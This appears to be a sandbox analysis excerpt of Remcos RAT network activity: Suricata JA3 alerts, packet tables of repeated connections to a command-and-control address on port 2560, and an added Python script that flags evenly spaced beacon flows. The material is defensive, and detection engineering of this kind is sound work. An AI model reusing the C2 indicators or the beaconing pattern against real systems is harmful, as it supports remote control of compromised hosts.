2024-12-17T20:41:52.656817+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 50071 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:41:55.005009+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 50072 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:41:57.272222+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 50073 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:41:59.540967+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 50074 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:42:01.786745+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 50075 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:42:04.051787+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 50076 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:42:06.517762+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 50077 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:42:08.786445+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 50078 | 107.173.4.16 | 2560 | TCP
2024-12-17T20:42:11.000967+0100 | 2036594 | ET JA3 Hash - Remcos 3.x/4.x TLS Connection | 1 | 192.168.2.6 | 50079 | 107.173.4.16 | 2560 | TCP
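The alert table above is the same JA3 signature firing again and again at an almost constant cadence: one fresh TLS connection (new ephemeral source port each time) to 107.173.4.16:2560 roughly every two to three seconds. That evenly spaced repeat is the beaconing pattern a detection engineer can hunt for even when no JA3 or Remcos signature exists for a new build. The Python below is an added example, not part of the Joe Sandbox report or of the Suricata ruleset: it groups alerts per flow, measures inter-arrival jitter, and flags flows whose intervals barely vary. The first ten rows are copied from the table above in a pipe-separated layout assumed here for parsing; the last three rows are constructed noise against a TEST-NET address with a local-rule SID, included only as a non-beaconing control. The thresholds min_hits and max_cv are illustrative choices, not values from the report.

```python
"""Beacon-cadence check over Suricata alert rows (added example, not from the report)."""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Column layout assumed: Timestamp|SID|Signature|Severity|SrcIP|SrcPort|DstIP|DstPort|Proto
# The first ten rows are copied from the report's alert table. The last three
# (203.0.113.5, SID 9000001) are CONSTRUCTED control noise, not from the report.
ALERT_LINES = """\
2024-12-17T20:38:09.344301+0100|2036594|ET JA3 Hash - Remcos 3.x/4.x TLS Connection|1|192.168.2.6|49711|107.173.4.16|2560|TCP
2024-12-17T20:38:12.444320+0100|2036594|ET JA3 Hash - Remcos 3.x/4.x TLS Connection|1|192.168.2.6|49713|107.173.4.16|2560|TCP
2024-12-17T20:38:15.518949+0100|2036594|ET JA3 Hash - Remcos 3.x/4.x TLS Connection|1|192.168.2.6|49716|107.173.4.16|2560|TCP
2024-12-17T20:38:18.610683+0100|2036594|ET JA3 Hash - Remcos 3.x/4.x TLS Connection|1|192.168.2.6|49727|107.173.4.16|2560|TCP
2024-12-17T20:38:21.715391+0100|2036594|ET JA3 Hash - Remcos 3.x/4.x TLS Connection|1|192.168.2.6|49734|107.173.4.16|2560|TCP
2024-12-17T20:38:24.782070+0100|2036594|ET JA3 Hash - Remcos 3.x/4.x TLS Connection|1|192.168.2.6|49742|107.173.4.16|2560|TCP
2024-12-17T20:38:27.881882+0100|2036594|ET JA3 Hash - Remcos 3.x/4.x TLS Connection|1|192.168.2.6|49754|107.173.4.16|2560|TCP
2024-12-17T20:38:30.956422+0100|2036594|ET JA3 Hash - Remcos 3.x/4.x TLS Connection|1|192.168.2.6|49760|107.173.4.16|2560|TCP
2024-12-17T20:38:34.048077+0100|2036594|ET JA3 Hash - Remcos 3.x/4.x TLS Connection|1|192.168.2.6|49771|107.173.4.16|2560|TCP
2024-12-17T20:38:37.143338+0100|2036594|ET JA3 Hash - Remcos 3.x/4.x TLS Connection|1|192.168.2.6|49778|107.173.4.16|2560|TCP
2024-12-17T20:38:01.000000+0100|9000001|LOCAL constructed control alert|3|192.168.2.6|49600|203.0.113.5|443|TCP
2024-12-17T20:38:02.000000+0100|9000001|LOCAL constructed control alert|3|192.168.2.6|49601|203.0.113.5|443|TCP
2024-12-17T20:38:41.000000+0100|9000001|LOCAL constructed control alert|3|192.168.2.6|49602|203.0.113.5|443|TCP
"""


def parse_alerts(text):
    """Parse pipe-separated alert rows into dicts with a timezone-aware datetime."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, sid, sig, sev, sip, sport, dip, dport, proto = line.split("|")
        rows.append({
            # %z accepts the "+0100" offset form used by Suricata's eve timestamps
            "ts": datetime.strptime(ts, "%Y-%m-%dT%H:%M:%S.%f%z"),
            "sid": int(sid), "sig": sig, "severity": int(sev),
            "src": sip, "sport": int(sport), "dst": dip, "dport": int(dport),
            "proto": proto,
        })
    return rows


def beacon_stats(rows, min_hits=5, max_cv=0.25):
    """Per (src, dst, dport, sid) flow: hit count, mean gap between alerts and the
    coefficient of variation (stdev / mean) of those gaps. A flow is flagged as a
    beacon when it repeats at least min_hits times with low jitter (cv < max_cv).
    The thresholds are illustrative, not values taken from the report."""
    groups = defaultdict(list)
    for r in rows:
        groups[(r["src"], r["dst"], r["dport"], r["sid"])].append(r["ts"])
    out = {}
    for key, stamps in groups.items():
        stamps.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(stamps, stamps[1:])]
        if len(gaps) >= 2:
            m = mean(gaps)
            cv = pstdev(gaps) / m if m > 0 else float("inf")
        else:
            m, cv = (gaps[0] if gaps else 0.0), float("inf")
        out[key] = {
            "hits": len(stamps),
            "mean_interval": round(m, 3),
            "cv": round(cv, 3),
            "beacon": len(stamps) >= min_hits and cv < max_cv,
        }
    return out


if __name__ == "__main__":
    for key, s in beacon_stats(parse_alerts(ALERT_LINES)).items():
        flag = "BEACON" if s["beacon"] else "ok"
        print(f"{flag:6} {key[0]} -> {key[1]}:{key[2]} sid={key[3]} "
              f"hits={s['hits']} mean={s['mean_interval']}s cv={s['cv']}")
```

Run it as-is and the Remcos flow comes out with ten hits, a mean gap just under 3.1 s and a coefficient of variation below 0.01, while the constructed control flow (three hits, gaps of 1 s and 39 s) is left unflagged. On a real sensor the same logic runs over eve.json or over plain conn logs, keyed on destination and port rather than on a SID, so that it also catches samples whose JA3 hash the ruleset does not yet know.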
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 17, 2024 20:37:57.856678963 CET | 443 | 49705 | 40.126.53.19 | 192.168.2.6
Dec 17, 2024 20:37:57.856704950 CET | 443 | 49705 | 40.126.53.19 | 192.168.2.6
Dec 17, 2024 20:37:57.856782913 CET | 49705 | 443 | 192.168.2.6 | 40.126.53.19
Dec 17, 2024 20:37:57.864217043 CET | 443 | 49705 | 40.126.53.19 | 192.168.2.6
Dec 17, 2024 20:37:57.904170036 CET | 49705 | 443 | 192.168.2.6 | 40.126.53.19
Dec 17, 2024 20:37:58.014657021 CET | 443 | 49706 | 20.198.119.143 | 192.168.2.6
Dec 17, 2024 20:37:58.016558886 CET | 49706 | 443 | 192.168.2.6 | 20.198.119.143
Dec 17, 2024 20:37:58.016647100 CET | 49706 | 443 | 192.168.2.6 | 20.198.119.143
Dec 17, 2024 20:37:58.016807079 CET | 49706 | 443 | 192.168.2.6 | 20.198.119.143
Dec 17, 2024 20:37:58.137121916 CET | 443 | 49706 | 20.198.119.143 | 192.168.2.6
Dec 17, 2024 20:37:58.137166023 CET | 443 | 49706 | 20.198.119.143 | 192.168.2.6
Dec 17, 2024 20:37:58.137202024 CET | 443 | 49706 | 20.198.119.143 | 192.168.2.6
Dec 17, 2024 20:37:58.562930107 CET | 443 | 49706 | 20.198.119.143 | 192.168.2.6
Dec 17, 2024 20:37:58.607450008 CET | 49706 | 443 | 192.168.2.6 | 20.198.119.143
Dec 17, 2024 20:37:58.755424023 CET | 443 | 49706 | 20.198.119.143 | 192.168.2.6
Dec 17, 2024 20:37:58.810569048 CET | 49706 | 443 | 192.168.2.6 | 20.198.119.143
Dec 17, 2024 20:37:58.947540998 CET | 443 | 49706 | 20.198.119.143 | 192.168.2.6
Dec 17, 2024 20:37:58.948586941 CET | 49706 | 443 | 192.168.2.6 | 20.198.119.143
Dec 17, 2024 20:37:59.068509102 CET | 443 | 49706 | 20.198.119.143 | 192.168.2.6
Dec 17, 2024 20:37:59.494255066 CET | 443 | 49706 | 20.198.119.143 | 192.168.2.6
Dec 17, 2024 20:37:59.544853926 CET | 49706 | 443 | 192.168.2.6 | 20.198.119.143
Dec 17, 2024 20:38:01.216836929 CET | 49673 | 443 | 192.168.2.6 | 173.222.162.64
Dec 17, 2024 20:38:01.216840982 CET | 49674 | 443 | 192.168.2.6 | 173.222.162.64
Dec 17, 2024 20:38:01.544867992 CET | 49672 | 443 | 192.168.2.6 | 173.222.162.64
Dec 17, 2024 20:38:07.279561996 CET | 49711 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:07.400165081 CET | 2560 | 49711 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:07.404512882 CET | 49711 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:07.406136990 CET | 49711 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:07.525791883 CET | 2560 | 49711 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:09.344214916 CET | 2560 | 49711 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:09.344300985 CET | 49711 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:09.344585896 CET | 49711 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:09.465262890 CET | 2560 | 49711 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:10.357955933 CET | 49713 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:10.477890968 CET | 2560 | 49713 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:10.478023052 CET | 49713 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:10.481535912 CET | 49713 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:10.601257086 CET | 2560 | 49713 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:10.826057911 CET | 49674 | 443 | 192.168.2.6 | 173.222.162.64
Dec 17, 2024 20:38:10.826060057 CET | 49673 | 443 | 192.168.2.6 | 173.222.162.64
Dec 17, 2024 20:38:11.154172897 CET | 49672 | 443 | 192.168.2.6 | 173.222.162.64
Dec 17, 2024 20:38:12.444224119 CET | 2560 | 49713 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:12.444319963 CET | 49713 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:12.444621086 CET | 49713 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:12.565143108 CET | 2560 | 49713 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:13.452095985 CET | 49716 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:13.572092056 CET | 2560 | 49716 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:13.572207928 CET | 49716 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:13.576195955 CET | 49716 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:13.585028887 CET | 443 | 49703 | 173.222.162.64 | 192.168.2.6
Dec 17, 2024 20:38:13.585305929 CET | 49703 | 443 | 192.168.2.6 | 173.222.162.64
Dec 17, 2024 20:38:13.695774078 CET | 2560 | 49716 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:15.517258883 CET | 2560 | 49716 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:15.518949032 CET | 49716 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:15.518949032 CET | 49716 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:15.639142036 CET | 2560 | 49716 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:16.530153036 CET | 49727 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:16.650247097 CET | 2560 | 49727 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:16.650810957 CET | 49727 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:16.655951023 CET | 49727 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:16.776288986 CET | 2560 | 49727 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:18.610526085 CET | 2560 | 49727 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:18.610682964 CET | 49727 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:18.651182890 CET | 49727 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:18.774949074 CET | 2560 | 49727 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:19.654731989 CET | 49734 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:19.775582075 CET | 2560 | 49734 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:19.775706053 CET | 49734 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:19.778908968 CET | 49734 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:19.898608923 CET | 2560 | 49734 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:21.715282917 CET | 2560 | 49734 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:21.715390921 CET | 49734 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:21.715475082 CET | 49734 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:21.835078001 CET | 2560 | 49734 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:22.720772028 CET | 49742 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:22.840517044 CET | 2560 | 49742 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:22.840603113 CET | 49742 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:22.845065117 CET | 49742 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:22.964624882 CET | 2560 | 49742 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:24.781982899 CET | 2560 | 49742 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:24.782069921 CET | 49742 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:24.782155037 CET | 49742 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:24.901953936 CET | 2560 | 49742 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:25.795886993 CET | 49754 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:25.915957928 CET | 2560 | 49754 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:25.916182995 CET | 49754 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:25.919064045 CET | 49754 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:26.040929079 CET | 2560 | 49754 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:27.881768942 CET | 2560 | 49754 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:27.881881952 CET | 49754 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:27.882014036 CET | 49754 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:28.001698971 CET | 2560 | 49754 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:28.889033079 CET | 49760 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:29.008882046 CET | 2560 | 49760 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:29.009011030 CET | 49760 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:29.012501001 CET | 49760 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:29.136486053 CET | 2560 | 49760 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:30.956319094 CET | 2560 | 49760 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:30.956422091 CET | 49760 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:30.960130930 CET | 49760 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:31.081882954 CET | 2560 | 49760 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:31.967411041 CET | 49771 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:32.087326050 CET | 2560 | 49771 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:32.087467909 CET | 49771 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:32.092752934 CET | 49771 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:32.213824987 CET | 2560 | 49771 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:34.048013926 CET | 2560 | 49771 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:34.048077106 CET | 49771 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:34.048202038 CET | 49771 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:34.169153929 CET | 2560 | 49771 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:35.060937881 CET | 49778 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:35.180866003 CET | 2560 | 49778 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:35.184662104 CET | 49778 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:35.188014030 CET | 49778 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:35.307821989 CET | 2560 | 49778 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:37.142936945 CET | 2560 | 49778 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:37.143337965 CET | 49778 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:37.143337965 CET | 49778 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:37.263042927 CET | 2560 | 49778 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:38.154798031 CET | 49787 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:38.275440931 CET | 2560 | 49787 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:38.275541067 CET | 49787 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:38.278963089 CET | 49787 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:38.404978037 CET | 2560 | 49787 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:40.215797901 CET | 2560 | 49787 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:40.216592073 CET | 49787 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:40.216670990 CET | 49787 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:40.338536024 CET | 2560 | 49787 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:41.232844114 CET | 49795 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:41.354609013 CET | 2560 | 49795 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:41.354868889 CET | 49795 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:41.357839108 CET | 49795 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:41.477448940 CET | 2560 | 49795 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:43.296300888 CET | 2560 | 49795 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:43.296587944 CET | 49795 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:43.296588898 CET | 49795 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:43.417402029 CET | 2560 | 49795 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:44.310915947 CET | 49801 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:44.432427883 CET | 2560 | 49801 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:44.432655096 CET | 49801 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:44.436321974 CET | 49801 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:44.557382107 CET | 2560 | 49801 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:46.391365051 CET | 2560 | 49801 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:46.391546011 CET | 49801 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:46.391580105 CET | 49801 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:46.701349974 CET | 49801 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:46.956531048 CET | 2560 | 49801 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:46.956593037 CET | 49801 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:46.957510948 CET | 2560 | 49801 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:46.957808018 CET | 2560 | 49801 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:46.957879066 CET | 49801 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:47.404958963 CET | 49807 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:47.525660038 CET | 2560 | 49807 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:47.525932074 CET | 49807 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:47.531104088 CET | 49807 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:47.650948048 CET | 2560 | 49807 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:49.467649937 CET | 2560 | 49807 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:49.467799902 CET | 49807 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:49.467912912 CET | 49807 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:49.587699890 CET | 2560 | 49807 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:50.483073950 CET | 49819 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:50.603892088 CET | 2560 | 49819 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:50.604010105 CET | 49819 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:50.611490011 CET | 49819 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:50.731410027 CET | 2560 | 49819 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:52.545018911 CET | 2560 | 49819 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:52.545169115 CET | 49819 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:52.545252085 CET | 49819 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:52.664935112 CET | 2560 | 49819 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:53.561157942 CET | 49825 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:53.680857897 CET | 2560 | 49825 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:53.681070089 CET | 49825 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:53.684159040 CET | 49825 | 2560 | 192.168.2.6 | 107.173.4.16
Dec 17, 2024 20:38:53.810570955 CET | 2560 | 49825 | 107.173.4.16 | 192.168.2.6
Dec 17, 2024 20:38:55.639230013 CET | 2560 | 49825 | 107.173.4.16 | 192.168.2.6
                                              Dec 17, 2024 20:38:55.639326096 CET498252560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:38:55.639404058 CET498252560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:38:55.774245024 CET256049825107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:38:56.685159922 CET498362560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:38:56.806289911 CET256049836107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:38:56.806421041 CET498362560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:38:56.840903997 CET498362560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:38:56.961894035 CET256049836107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:38:58.751178980 CET256049836107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:38:58.751342058 CET498362560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:38:58.751446962 CET498362560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:38:58.874566078 CET256049836107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:38:59.764386892 CET498422560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:38:59.886704922 CET256049842107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:38:59.886941910 CET498422560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:38:59.891901970 CET498422560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:00.012223959 CET256049842107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:01.830319881 CET256049842107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:01.830462933 CET498422560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:01.830555916 CET498422560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:01.950592041 CET256049842107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:02.842384100 CET498472560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:03.261769056 CET256049847107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:03.261996031 CET498472560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:03.265029907 CET498472560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:03.384598970 CET256049847107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:05.201070070 CET256049847107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:05.201257944 CET498472560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:05.201556921 CET498472560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:05.323407888 CET256049847107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:06.217482090 CET498562560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:06.337502003 CET256049856107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:06.337620974 CET498562560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:06.342557907 CET498562560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:06.462362051 CET256049856107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:08.281503916 CET256049856107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:08.281636000 CET498562560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:08.281709909 CET498562560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:08.402738094 CET256049856107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:09.295600891 CET498622560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:09.415606022 CET256049862107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:09.415771008 CET498622560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:09.420303106 CET498622560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:09.540329933 CET256049862107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:11.357709885 CET256049862107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:11.357781887 CET498622560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:11.357845068 CET498622560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:11.477793932 CET256049862107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:12.373444080 CET498682560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:12.493091106 CET256049868107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:12.496633053 CET498682560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:12.499973059 CET498682560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:12.620512009 CET256049868107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:14.436053991 CET256049868107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:14.436701059 CET498682560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:14.436932087 CET498682560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:14.556413889 CET256049868107.173.4.16192.168.2.6
                                              Dec 17, 2024 20:39:15.452126026 CET498762560192.168.2.6107.173.4.16
                                              Dec 17, 2024 20:39:15.572017908 CET256049876107.173.4.16192.168.2.6
